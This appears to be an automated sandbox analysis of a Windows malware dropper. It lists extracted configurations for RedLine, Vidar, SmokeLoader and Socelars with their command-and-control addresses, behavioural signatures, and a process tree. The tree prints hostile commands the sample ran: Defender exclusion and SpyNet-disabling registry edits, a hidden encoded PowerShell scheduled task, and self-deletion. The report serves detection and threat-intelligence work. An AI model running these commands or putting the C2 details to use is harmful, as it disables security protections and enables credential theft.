Analysis

  • max time kernel
    152s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    10-03-2022 13:23

General

  • Target

    62b754e5c3bd69b737dbea0c630942828dda7056018f6878c85eac39b223bf2c.exe

  • Size

    3.4MB

  • MD5

    39db7a0142b5414dc302e7e4b8faf88e

  • SHA1

    0498b92586e264ce2554ca6934b9d4d8b39d98d9

  • SHA256

    62b754e5c3bd69b737dbea0c630942828dda7056018f6878c85eac39b223bf2c

  • SHA512

    2465bd41794f51364dbc26bc483c26c46305d5e924d1eb20aa0745c0d0055abd6632ea740c2a24993b0f30ab254746c5b22ae0313785a1b106934e572f199be8

Malware Config

Extracted

Family

redline

Botnet

ServAni

C2

87.251.71.195:82

Extracted

Family

vidar

Version

39.4

Botnet

706

C2

https://sergeevih43.tumblr.com/

Attributes
  • profile_id

    706

Extracted

Family

smokeloader

Version

2020

C2

http://ppcspb.com/upload/

http://mebbing.com/upload/

http://twcamel.com/upload/

http://howdycash.com/upload/

http://lahuertasonora.com/upload/

http://kpotiques.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

dadad123

C2

86.107.197.196:63065

Attributes
  • auth_value

    dd4834614a3ac04a7b90791c224626a2

Extracted

Family

socelars

C2

https://sa-us-bucket.s3.us-east-2.amazonaws.com/asdhjk/

Extracted

Family

vidar

Version

50.6

Botnet

937

C2

https://mas.to/@s4msalo

https://koyu.space/@samsa2l

Attributes
  • profile_id

    937

Signatures

  • DcRat 20 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • OnlyLogger

    A tiny loader that uses IPLogger to get its payload.

  • Process spawned unexpected child process 10 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • OnlyLogger Payload 2 IoCs
  • Vidar Stealer 4 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 36 IoCs
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 1 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 16 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 11 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 37 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 15 IoCs
  • Drops file in Windows directory 7 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 23 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 42 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 17 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 22 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 24 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\62b754e5c3bd69b737dbea0c630942828dda7056018f6878c85eac39b223bf2c.exe
    "C:\Users\Admin\AppData\Local\Temp\62b754e5c3bd69b737dbea0c630942828dda7056018f6878c85eac39b223bf2c.exe"
    1⤵
    • DcRat
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3312
    • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\setup_install.exe
      "C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\setup_install.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2504
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sonia_8.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3408
        • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\sonia_8.exe
          sonia_8.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4448
          • C:\Users\Admin\AppData\Local\Temp\is-IT76D.tmp\sonia_8.tmp
            "C:\Users\Admin\AppData\Local\Temp\is-IT76D.tmp\sonia_8.tmp" /SL5="$5006A,506127,422400,C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\sonia_8.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:2248
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sonia_7.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2752
        • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\sonia_7.exe
          sonia_7.exe
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:1320
          • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\sonia_7.exe
            C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\sonia_7.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2884
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c sonia_6.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3148
        • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\sonia_6.exe
          sonia_6.exe
          4⤵
          • Executes dropped EXE
          • Checks computer location settings
          PID:820
          • C:\Users\Admin\Documents\DK8cY7dTR7tto2Rt2pnijZzM.exe
            "C:\Users\Admin\Documents\DK8cY7dTR7tto2Rt2pnijZzM.exe"
            5⤵
            • Executes dropped EXE
            PID:2636
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2636 -s 436
              6⤵
              • Program crash
              PID:1784
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2636 -s 452
              6⤵
              • Program crash
              PID:3172
          • C:\Users\Admin\Documents\1_r18zjk9LQYSOU2UzHWEnuP.exe
            "C:\Users\Admin\Documents\1_r18zjk9LQYSOU2UzHWEnuP.exe"
            5⤵
            • Executes dropped EXE
            PID:1756
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 432
              6⤵
              • Program crash
              PID:2428
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1756 -s 440
              6⤵
              • Program crash
              PID:4032
          • C:\Users\Admin\Documents\VFUp4JNN4sWhSY2fyPxCTXlj.exe
            "C:\Users\Admin\Documents\VFUp4JNN4sWhSY2fyPxCTXlj.exe"
            5⤵
            • Executes dropped EXE
            • Checks computer location settings
            PID:2772
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 660
              6⤵
              • Program crash
              PID:824
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 624
              6⤵
              • Program crash
              PID:4228
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 640
              6⤵
              • Program crash
              PID:4216
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 788
              6⤵
              • Program crash
              PID:1908
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 1256
              6⤵
              • Program crash
              PID:176
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 1292
              6⤵
              • Program crash
              PID:776
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 1300
              6⤵
              • Program crash
              PID:3256
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 1304
              6⤵
              • Program crash
              PID:2880
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c taskkill /im "VFUp4JNN4sWhSY2fyPxCTXlj.exe" /f & erase "C:\Users\Admin\Documents\VFUp4JNN4sWhSY2fyPxCTXlj.exe" & exit
              6⤵
                PID:3184
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /im "VFUp4JNN4sWhSY2fyPxCTXlj.exe" /f
                  7⤵
                  • Kills process with taskkill
                  PID:4044
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2772 -s 1340
                6⤵
                • Program crash
                PID:4716
            • C:\Users\Admin\Documents\YN_zvspWH14l_iBCwLB0kIVG.exe
              "C:\Users\Admin\Documents\YN_zvspWH14l_iBCwLB0kIVG.exe"
              5⤵
              • Executes dropped EXE
              PID:1968
            • C:\Users\Admin\Documents\sJo87LxSDD9__EAEr9rW_vO_.exe
              "C:\Users\Admin\Documents\sJo87LxSDD9__EAEr9rW_vO_.exe"
              5⤵
              • Executes dropped EXE
              PID:1164
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1164 -s 432
                6⤵
                • Program crash
                PID:3976
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 1164 -s 452
                6⤵
                • Program crash
                PID:4744
            • C:\Users\Admin\Documents\yI7DX_DfJoZlFzk1xXfWJ510.exe
              "C:\Users\Admin\Documents\yI7DX_DfJoZlFzk1xXfWJ510.exe"
              5⤵
              • Executes dropped EXE
              PID:1320
            • C:\Users\Admin\Documents\ohrVKyPI7EWW1tfxkZ_sH3yz.exe
              "C:\Users\Admin\Documents\ohrVKyPI7EWW1tfxkZ_sH3yz.exe"
              5⤵
              • Executes dropped EXE
              • Checks computer location settings
              • Loads dropped DLL
              • Checks processor information in registry
              PID:2752
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c taskkill /im ohrVKyPI7EWW1tfxkZ_sH3yz.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\ohrVKyPI7EWW1tfxkZ_sH3yz.exe" & del C:\ProgramData\*.dll & exit
                6⤵
                  PID:4816
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /im ohrVKyPI7EWW1tfxkZ_sH3yz.exe /f
                    7⤵
                    • Kills process with taskkill
                    PID:1396
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /t 6
                    7⤵
                    • Delays execution with timeout.exe
                    PID:2996
              • C:\Users\Admin\Documents\buS8FZ3DRIUrAk4OvYfmVy94.exe
                "C:\Users\Admin\Documents\buS8FZ3DRIUrAk4OvYfmVy94.exe"
                5⤵
                • Executes dropped EXE
                PID:4456
                • C:\Users\Admin\AppData\Local\Temp\7zS5AEA.tmp\Install.exe
                  .\Install.exe
                  6⤵
                  • Executes dropped EXE
                  PID:5056
                  • C:\Users\Admin\AppData\Local\Temp\7zS6A0D.tmp\Install.exe
                    .\Install.exe /S /site_id "525403"
                    7⤵
                    • Executes dropped EXE
                    • Checks BIOS information in registry
                    • Checks computer location settings
                    • Drops file in System32 directory
                    • Enumerates system info in registry
                    PID:2708
                    • C:\Windows\SysWOW64\forfiles.exe
                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                      8⤵
                        PID:4220
                        • C:\Windows\SysWOW64\cmd.exe
                          /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                          9⤵
                            PID:636
                            • \??\c:\windows\SysWOW64\reg.exe
                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                              10⤵
                                PID:4936
                              • \??\c:\windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                10⤵
                                  PID:2804
                            • C:\Windows\SysWOW64\forfiles.exe
                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                              8⤵
                                PID:4488
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                  9⤵
                                    PID:4032
                                    • \??\c:\windows\SysWOW64\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                      10⤵
                                        PID:4592
                                      • \??\c:\windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                        10⤵
                                          PID:2392
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /CREATE /TN "gNcbamgXB" /SC once /ST 05:18:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                      8⤵
                                      • DcRat
                                      • Creates scheduled task(s)
                                      PID:3672
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /run /I /tn "gNcbamgXB"
                                      8⤵
                                        PID:776
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /DELETE /F /TN "gNcbamgXB"
                                        8⤵
                                          PID:2520
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 13:27:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\gqowqHz.exe\" j6 /site_id 525403 /S" /V1 /F
                                          8⤵
                                          • DcRat
                                          • Drops file in Windows directory
                                          • Creates scheduled task(s)
                                          PID:4068
                                  • C:\Users\Admin\Documents\7jZ97ZhCTuuwbp5sGRkwvfvN.exe
                                    "C:\Users\Admin\Documents\7jZ97ZhCTuuwbp5sGRkwvfvN.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    • Adds Run key to start application
                                    • Suspicious use of SetThreadContext
                                    PID:2536
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                      C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                      6⤵
                                        PID:4696
                                    • C:\Users\Admin\Documents\X2BRUauiV9bHWUL6X8s4_FuB.exe
                                      "C:\Users\Admin\Documents\X2BRUauiV9bHWUL6X8s4_FuB.exe"
                                      5⤵
                                      • Executes dropped EXE
                                      PID:404
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\X2BRUauiV9bHWUL6X8s4_FuB.exe
                                        6⤵
                                          PID:4224
                                          • C:\Windows\system32\choice.exe
                                            choice /C Y /N /D Y /T 0
                                            7⤵
                                              PID:3924
                                        • C:\Users\Admin\Documents\mlqnXWtpnzTS5BYlFuZAWhGF.exe
                                          "C:\Users\Admin\Documents\mlqnXWtpnzTS5BYlFuZAWhGF.exe"
                                          5⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:208
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /c taskkill /f /im chrome.exe
                                            6⤵
                                              PID:3140
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill /f /im chrome.exe
                                                7⤵
                                                • Kills process with taskkill
                                                PID:2396
                                          • C:\Users\Admin\Documents\sMtHfmi6tHD1TiqDDM6KZyfd.exe
                                            "C:\Users\Admin\Documents\sMtHfmi6tHD1TiqDDM6KZyfd.exe"
                                            5⤵
                                            • Executes dropped EXE
                                            PID:3312
                                          • C:\Users\Admin\Documents\cJnu2iuKnnoKTzK2ewCeCZjU.exe
                                            "C:\Users\Admin\Documents\cJnu2iuKnnoKTzK2ewCeCZjU.exe"
                                            5⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            • Checks processor information in registry
                                            PID:3880
                                            • C:\Windows\SysWOW64\rundll32.exe
                                              "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                              6⤵
                                              • Blocklisted process makes network request
                                              PID:2016
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 608
                                              6⤵
                                              • Program crash
                                              PID:2880
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 928
                                              6⤵
                                              • Program crash
                                              PID:116
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 1032
                                              6⤵
                                              • Program crash
                                              PID:1476
                                            • C:\Windows\SysWOW64\rundll32.exe
                                              "C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
                                              6⤵
                                              • Blocklisted process makes network request
                                              • Checks processor information in registry
                                              • Modifies registry class
                                              • Suspicious use of FindShellTrayWindow
                                              PID:3328
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 960
                                              6⤵
                                              • Program crash
                                              PID:4256
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 1048
                                              6⤵
                                              • Program crash
                                              PID:1776
                                          • C:\Users\Admin\Documents\Zu_x3KG6zM3aquMhaLW9hTuW.exe
                                            "C:\Users\Admin\Documents\Zu_x3KG6zM3aquMhaLW9hTuW.exe"
                                            5⤵
                                            • Executes dropped EXE
                                            • Checks computer location settings
                                            PID:3512
                                          • C:\Users\Admin\Documents\syWzBHkeuFImIhcTpagToQNL.exe
                                            "C:\Users\Admin\Documents\syWzBHkeuFImIhcTpagToQNL.exe"
                                            5⤵
                                              PID:4340
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c sonia_5.exe
                                          3⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:4084
                                          • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\sonia_5.exe
                                            sonia_5.exe
                                            4⤵
                                            • Executes dropped EXE
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1548
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c sonia_4.exe
                                          3⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:1696
                                          • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\sonia_4.exe
                                            sonia_4.exe
                                            4⤵
                                            • Executes dropped EXE
                                            • Suspicious use of WriteProcessMemory
                                            PID:4760
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              5⤵
                                              • Executes dropped EXE
                                              PID:3300
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              5⤵
                                              • Executes dropped EXE
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:544
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c sonia_3.exe
                                          3⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:4560
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c sonia_2.exe
                                          3⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:4552
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c sonia_1.exe
                                          3⤵
                                          • Suspicious use of WriteProcessMemory
                                          PID:4580
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 556
                                          3⤵
                                          • Program crash
                                          PID:3512
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
                                            4⤵
                                              PID:4288
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd
                                                5⤵
                                                  PID:4704
                                                  • C:\Windows\SysWOW64\tasklist.exe
                                                    tasklist /FI "imagename eq BullGuardCore.exe"
                                                    6⤵
                                                    • Enumerates processes with tasklist
                                                    PID:2832
                                                  • C:\Windows\SysWOW64\find.exe
                                                    find /I /N "bullguardcore.exe"
                                                    6⤵
                                                      PID:1712
                                                    • C:\Windows\SysWOW64\find.exe
                                                      find /I /N "psuaservice.exe"
                                                      6⤵
                                                        PID:3796
                                                      • C:\Windows\SysWOW64\tasklist.exe
                                                        tasklist /FI "imagename eq PSUAService.exe"
                                                        6⤵
                                                        • Enumerates processes with tasklist
                                                        PID:2260
                                                      • C:\Windows\SysWOW64\findstr.exe
                                                        findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
                                                        6⤵
                                                          PID:4968
                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
                                                          Accostarmi.exe.pif N
                                                          6⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Suspicious use of SetThreadContext
                                                          • Suspicious use of FindShellTrayWindow
                                                          • Suspicious use of SendNotifyMessage
                                                          PID:996
                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
                                                            7⤵
                                                            • Executes dropped EXE
                                                            PID:3592
                                              • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\sonia_1.exe
                                                sonia_1.exe
                                                1⤵
                                                • Executes dropped EXE
                                                • Checks computer location settings
                                                • Modifies registry class
                                                • Suspicious use of WriteProcessMemory
                                                PID:4820
                                                • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                  "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
                                                  2⤵
                                                  • Loads dropped DLL
                                                  PID:208
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 208 -s 608
                                                    3⤵
                                                    • Program crash
                                                    PID:848
                                              • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\sonia_2.exe
                                                sonia_2.exe
                                                1⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Checks SCSI registry key(s)
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious behavior: MapViewOfSection
                                                PID:1408
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2504 -ip 2504
                                                1⤵
                                                  PID:1404
                                                • C:\Users\Admin\AppData\Local\Temp\7zS0FC683AD\sonia_3.exe
                                                  sonia_3.exe
                                                  1⤵
                                                  • Executes dropped EXE
                                                  • Modifies system certificate store
                                                  PID:4920
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4920 -s 940
                                                    2⤵
                                                    • Program crash
                                                    PID:632
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 208 -ip 208
                                                  1⤵
                                                    PID:2708
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4920 -ip 4920
                                                    1⤵
                                                      PID:4244
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 2636 -ip 2636
                                                      1⤵
                                                        PID:3796
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2772 -ip 2772
                                                        1⤵
                                                          PID:3364
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1164 -ip 1164
                                                          1⤵
                                                            PID:4320
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1320 -ip 1320
                                                            1⤵
                                                              PID:4552
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1320 -ip 1320
                                                              1⤵
                                                                PID:1812
                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                "C:\Windows\System32\WScript.exe" "C:\Netdhcpsvc\77FTyD6gK21dfSGhRqsixY3e.vbe"
                                                                1⤵
                                                                • Checks computer location settings
                                                                PID:4476
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c ""C:\Netdhcpsvc\jGDslx6begqObyzNRSfaWpJOf.bat" "
                                                                  2⤵
                                                                    PID:1776
                                                                    • C:\Netdhcpsvc\NetdhcpsvcDriverintocrt.exe
                                                                      "C:\Netdhcpsvc\NetdhcpsvcDriverintocrt.exe"
                                                                      3⤵
                                                                      • Executes dropped EXE
                                                                      PID:448
                                                                      • C:\Program Files\Windows Portable Devices\RuntimeBroker.exe
                                                                        "C:\Program Files\Windows Portable Devices\RuntimeBroker.exe"
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        PID:1260
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3312 -ip 3312
                                                                  1⤵
                                                                    PID:4988
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3312 -ip 3312
                                                                    1⤵
                                                                      PID:2520
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 2772 -ip 2772
                                                                      1⤵
                                                                        PID:3848
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1756 -ip 1756
                                                                        1⤵
                                                                          PID:4672
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1164 -ip 1164
                                                                          1⤵
                                                                            PID:4876
